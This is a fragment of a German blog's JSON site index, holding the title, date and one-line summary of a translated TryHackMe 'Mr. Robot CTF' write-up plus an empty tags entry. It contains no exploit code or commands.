Vielen Dank für Ihre Zeit 💙 # ","date":"23 Mai 2021","permalink":"/de/blog/mr-robot-ctf/","section":"Blogs","summary":"🤖 TryHackMe Mr. Robot CTF 🤖 Hinweis: Diese Seite wurde mit Hilfe von DeepL und Google Translate ins Deutsche übersetzt. Können wir Mr. Robot CTF hacken? Diese virtuelle Maschine ist mit mittel bewertet und wird uns viele nützliche Dinge beibringen.","title":"Mr. Robot CTF"},{"content":"","date":"1 Januar 0001","permalink":"/de/tags/","section":"Tags","summary":"","title":"Tags"}]